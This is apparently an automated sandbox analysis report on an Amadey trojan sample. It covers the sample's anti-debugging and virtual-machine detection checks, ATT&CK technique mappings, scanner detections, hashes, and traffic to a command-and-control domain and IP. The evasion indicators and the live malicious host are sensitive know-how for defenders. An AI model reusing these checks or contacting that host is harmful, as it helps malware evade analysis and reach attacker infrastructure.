Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F902D6 second address: 6F902ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F902ED second address: 6F90310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F61848348A1h 0x0000000a jmp 00007F618483489Bh 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6F90310 second address: 6F90337 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ecx, edi 0x00000010 push edi 0x00000011 pop eax 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FC0273 second address: 6FC0283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F618483489Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FC0283 second address: 6FC02AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov edx, 53B7D9BAh 0x00000012 push ebx 0x00000013 mov eax, 2E5DF19Dh 0x00000018 pop eax 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FC02AA second address: 6FC02AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FC02AE second address: 6FC02C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FB08A1 second address: 6FB08BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F61848348A7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Special instruction interceptor: First address: 103A7EF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Special instruction interceptor: First address: 1063EDB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Special instruction interceptor: First address: 1043799 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Special instruction interceptor: First address: 10C8D3A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: 0_2_00A69980 rdtsc 0_2_00A69980
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe TID: 6764 Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe TID: 5008 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe TID: 4428 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: 0_2_0088255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0088255D
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: 0_2_008829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_008829FF
Source: f9bcOz8SxR.exe, f9bcOz8SxR.exe, 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: f9bcOz8SxR.exe, 00000000.00000003.2231447033.0000000001601000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2232262554.0000000001604000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: f9bcOz8SxR.exe Binary or memory string: Hyper-V RAW
Source: f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: f9bcOz8SxR.exe, 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: f9bcOz8SxR.exe, 00000000.00000003.2619927934.0000000001667000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2569039069.0000000001642000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619689608.0000000001661000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619620366.0000000001658000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619184023.0000000001654000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000002.2633653374.0000000001668000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe File opened: NTICE
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe File opened: SICE
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe File opened: SIWVID
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Code function: 0_2_00A69980 rdtsc 0_2_00A69980
Source: f9bcOz8SxR.exe, f9bcOz8SxR.exe, 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: )*Program Manager
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\f9bcOz8SxR.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic TCP traffic: 192.168.2.5:49720 -> 147.45.113.159:80
Source: global traffic TCP traffic: 192.168.2.5:49803 -> 147.45.113.159:80

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 24 Virtualization/Sandbox Evasion | OS Credential Dumping | 751 Security Software Discovery | 1 Exploitation of Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 24 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Data from Local System | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 13 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 216 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| f9bcOz8SxR.exe | 50% | Virustotal | |
| f9bcOz8SxR.exe | 68% | ReversingLabs | Win32.Trojan.Amadey |
| f9bcOz8SxR.exe | 100% | Avira | TR/Crypt.TPM.Gen |
| f9bcOz8SxR.exe | 100% | Joe Sandbox ML | |

No Antivirus matches

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| home.twentytk20pn.top | 147.45.113.159 | true | false | | high |
| httpbin.org | 34.226.108.155 | true | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322 | false | | high |
| https://httpbin.org/ip | false | | high |

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 34.226.108.155 | httpbin.org | United States | 14618 | AMAZON-AESUS | false |
| 147.45.113.159 | home.twentytk20pn.top | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false |

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578919
Start date and time: 2024-12-20 16:39:37 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: f9bcOz8SxR.exe
renamed because original name is a hash value
Original Sample Name: 1d057672840921889505863b33e87671.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 51%
• Number of executed functions: 142
• Number of non-executed functions: 51
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 40.126.53.19, 13.107.246.63, 4.245.163.56
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          TimeTypeDescription
                                          10:41:14API Interceptor66x Sleep call for process: f9bcOz8SxR.exe modified
                                                              No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.987895209342701
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: f9bcOz8SxR.exe
File size: 4'436'480 bytes
MD5: 1d057672840921889505863b33e87671
SHA1: 3bbc68098e4080f656c7f92147a54d05d18e1277
SHA256: e4420b07cff76b9f623b1e9ed3957d708769a744f245e27fb3b1e44cdc67eb35
SHA512: 12f5d869fea831d66f0811bc00a2c25e4d156f24189a7eee3e4593d0062057638686f780132a188f52ac6de9fba78404517ca041205c6834dd135217d0ab4eed
SSDEEP: 98304:B4PLy6XyZ1/zueq6LPtQ+IJU/Wxafa8Q8dTrVaLgZqyf+aCGxqGqE31y:2umi7ueq1HiqafFQmVBkG4O
TLSH: 952633E5AA2FD26DC4FB1B74C2EBAA181D89107539C009B58E8B7059C82FE70D7B1974
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2...........PD...@..........................@......a^D...@... ............................
Icon Hash: 00928e8e8686b000
Entrypoint: 0xf51000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x676055E0 [Mon Dec 16 16:31:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x61905f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x618000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb4f594 | 0x10 | dakbihel
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xb4f544 | 0x18 | dakbihel
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x617000 | 0x283e00 | 7f6ebc87a71fe2f26461378a0f492ccf | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x618000 | 0x2b0 | 0x200 | 31ae601560fd8baf2b37778150275b3e | False | 0.80078125 | data | 6.099968549772271 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x619000 | 0x1000 | 0x200 | e8fbf92e0939d0cd4935f0fe539e974d | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x61a000 | 0x382000 | 0x200 | 60c0697eebab43dc681681e1d3a3ecd3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dakbihel | 0x99c000 | 0x1b4000 | 0x1b3800 | dd6e2db1bdac4259bfa83dd5f75f5808 | False | 0.9944495147459816 | data | 7.9549442757670565 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
elpejykg | 0xb50000 | 0x1000 | 0x400 | ac8035ee0ba04c4232c0fe1763be2cba | False | 0.78125 | data | 6.120432676117238 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xb51000 | 0x3000 | 0x2200 | d714e71b200bc16a600640d05d11acd2 | False | 0.07065716911764706 | DOS executable (COM) | 0.7596637596523458 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xb4f5a4 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
                                                              Dec 20, 2024 16:40:49.160586119 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.160638094 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.279654980 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.279696941 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.279733896 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.279747963 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.279771090 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.279782057 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.279814005 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.279827118 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.279912949 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.279963970 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.280028105 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.280129910 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.322437048 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.322657108 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.442337036 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.442433119 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.486892939 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.602258921 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.605964899 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.806293011 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.809834003 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.050271034 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.050340891 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.081680059 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.081912994 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.081996918 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.082010984 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.170090914 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.171880960 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.201576948 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.201664925 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.201685905 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.201775074 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.201818943 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.201848030 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.201884031 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.201909065 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.201931000 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.201984882 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.202003002 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.202054024 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.202069998 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.203846931 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.203963041 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.209346056 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.291598082 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.291634083 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.291680098 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.291717052 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.321609974 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.321712971 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.321723938 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.321785927 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.321820974 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.321870089 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.321968079 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.322071075 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.322215080 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.322226048 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.322365999 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.322457075 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.323698044 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.323781013 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.323944092 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.324026108 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.324120998 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.324245930 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.324258089 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.324270010 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.324345112 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.324522018 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.324909925 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.329365969 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.329405069 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.329531908 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.329541922 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.329754114 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.329790115 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.329998016 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330112934 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330125093 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330149889 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330401897 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330476999 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330542088 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330552101 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330631971 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330662012 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330756903 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330765963 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330838919 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330980062 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330991030 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331002951 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331058979 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331068993 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331188917 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331226110 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331305027 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331321955 CET8049720147.45.113.159192.168.2.5
